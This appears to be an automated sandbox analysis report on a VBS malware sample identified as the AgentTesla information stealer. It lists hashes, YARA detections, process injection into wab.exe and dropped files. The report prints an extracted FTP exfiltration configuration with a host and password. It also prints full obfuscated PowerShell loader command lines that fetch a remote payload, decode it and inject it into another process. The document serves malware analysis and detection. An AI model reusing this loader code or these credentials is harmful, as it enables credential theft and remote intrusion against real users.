Analysis

max time kernel: 140s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-04-2024 01:31
Static task: static1

Behavioral task: behavioral1
  Sample: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
  Resource: win7-20240215-en

Behavioral task: behavioral2
  Sample: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
  Resource: win10v2004-20240426-en
General

Target: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Size: 59KB
MD5: 3c00879a0e4e4a7d7b78bb8611bcc94f
SHA1: 3ddd2f54b7fb54df60134318515fd61b119bc46f
SHA256: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f
SHA512: 4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c
SSDEEP: 1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv
Malware Config

Extracted: agenttesla
  Protocol: ftp
  Host: ftp://ftp.concaribe.com
  Port: 21
  Username: [email protected]
  Password: 2ogFj^8ECV(?
Signatures

AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Detect packed .NET executables. Mostly AgentTeslaV4. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_EXE_Packed_GEN01
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_EXE_Packed_GEN01

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_SUSPICIOUS_Binary_References_Browsers
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects executables referencing Windows vault credential objects. Observed in infostealers. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

Detects executables referencing many file transfer clients. Observed in information stealers. (2 IoCs)
  resource  yara_rule
  behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
  behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients

Blocklisted process makes network request (1 IoCs)
  flow  pid   process
  5     1680  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                  process
  Key value queried  \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation  WScript.exe

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  17    api.ipify.org
  18    api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid   process
  1036  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   process
  4868  powershell.exe
  1036  wab.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                          pid   process         target process
  PID 4868 set thread context of 1036  4868  powershell.exe  wab.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Runs ping.exe (1 TTPs, 2 IoCs)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   process
  1680  powershell.exe
  1680  powershell.exe
  4868  powershell.exe
  4868  powershell.exe
  4868  powershell.exe
  1036  wab.exe
  1036  wab.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid   process
  4868  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  1680  powershell.exe
  Token: SeDebugPrivilege  4868  powershell.exe
  Token: SeDebugPrivilege  1036  wab.exe

Suspicious use of WriteProcessMemory (21 IoCs)
  description                        pid   process         target process
  PID 4056 wrote to memory of 540    4056  WScript.exe     ping.exe
  PID 4056 wrote to memory of 540    4056  WScript.exe     ping.exe
  PID 4056 wrote to memory of 3880   4056  WScript.exe     ping.exe
  PID 4056 wrote to memory of 3880   4056  WScript.exe     ping.exe
  PID 4056 wrote to memory of 4676   4056  WScript.exe     cmd.exe
  PID 4056 wrote to memory of 4676   4056  WScript.exe     cmd.exe
  PID 4056 wrote to memory of 1680   4056  WScript.exe     powershell.exe
  PID 4056 wrote to memory of 1680   4056  WScript.exe     powershell.exe
  PID 1680 wrote to memory of 3312   1680  powershell.exe  cmd.exe
  PID 1680 wrote to memory of 3312   1680  powershell.exe  cmd.exe
  PID 1680 wrote to memory of 4868   1680  powershell.exe  powershell.exe
  PID 1680 wrote to memory of 4868   1680  powershell.exe  powershell.exe
  PID 1680 wrote to memory of 4868   1680  powershell.exe  powershell.exe
  PID 4868 wrote to memory of 3416   4868  powershell.exe  cmd.exe
  PID 4868 wrote to memory of 3416   4868  powershell.exe  cmd.exe
  PID 4868 wrote to memory of 3416   4868  powershell.exe  cmd.exe
  PID 4868 wrote to memory of 1036   4868  powershell.exe  wab.exe
  PID 4868 wrote to memory of 1036   4868  powershell.exe  wab.exe
  PID 4868 wrote to memory of 1036   4868  powershell.exe  wab.exe
  PID 4868 wrote to memory of 1036   4868  powershell.exe  wab.exe
  PID 4868 wrote to memory of 1036   4868  powershell.exe  wab.exe
Processes

C:\Windows\System32\WScript.exe  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs"  1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory

C:\Windows\System32\ping.exe  ping google.com -n 1  2⤵
- Runs ping.exe

C:\Windows\System32\ping.exe  ping %.%.%.%  2⤵
- Runs ping.exe

C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c dir  2⤵

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. 
.nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN 
SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF 
Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. 
IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\Windows\system32\cmd.exe  "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"  3⤵

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. 
.nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN 
SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF 
Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. 
IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"  4⤵

C:\Program Files (x86)\windows mail\wab.exe  "C:\Program Files (x86)\windows mail\wab.exe"  4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2x0dymh.qnj.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Veredict.mou
  Filesize: 430KB
  MD5: 446bd53386a67b6e402c67f8077b3a9e
  SHA1: 11d006e1c77dddfff4559bef35ec15bd01fb8cbc
  SHA256: 85f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4
  SHA512: 1afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838

memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp  Filesize: 18.3MB
memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp  Filesize: 264KB
memory/1036-47-0x0000000023F50000-0x0000000023FA0000-memory.dmp  Filesize: 320KB
memory/1036-49-0x0000000023F40000-0x0000000023F4A000-memory.dmp  Filesize: 40KB
memory/1036-48-0x0000000024640000-0x00000000246D2000-memory.dmp  Filesize: 584KB
memory/1680-12-0x000002A284FD0000-0x000002A284FE0000-memory.dmp  Filesize: 64KB
memory/1680-10-0x00007FF883830000-0x00007FF8842F1000-memory.dmp  Filesize: 10.8MB
memory/1680-46-0x00007FF883830000-0x00007FF8842F1000-memory.dmp  Filesize: 10.8MB
memory/1680-11-0x000002A284FD0000-0x000002A284FE0000-memory.dmp  Filesize: 64KB
memory/1680-9-0x000002A285230000-0x000002A285252000-memory.dmp  Filesize: 136KB
memory/1680-41-0x000002A284FD0000-0x000002A284FE0000-memory.dmp  Filesize: 64KB
memory/1680-42-0x000002A284FD0000-0x000002A284FE0000-memory.dmp  Filesize: 64KB
memory/1680-40-0x00007FF883830000-0x00007FF8842F1000-memory.dmp  Filesize: 10.8MB
memory/4868-17-0x0000000004F20000-0x0000000004F42000-memory.dmp  Filesize: 136KB
memory/4868-35-0x00000000064E0000-0x0000000006502000-memory.dmp  Filesize: 136KB
